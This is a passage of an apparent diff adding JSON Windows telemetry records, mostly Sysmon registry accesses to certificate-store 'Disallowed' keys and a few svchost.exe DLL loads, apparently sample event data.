"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "miutils.dll", + "image_path": "C:\\Windows\\System32\\miutils.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "WsmSvc.dll", + "image_path": "C:\\Windows\\System32\\WsmSvc.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 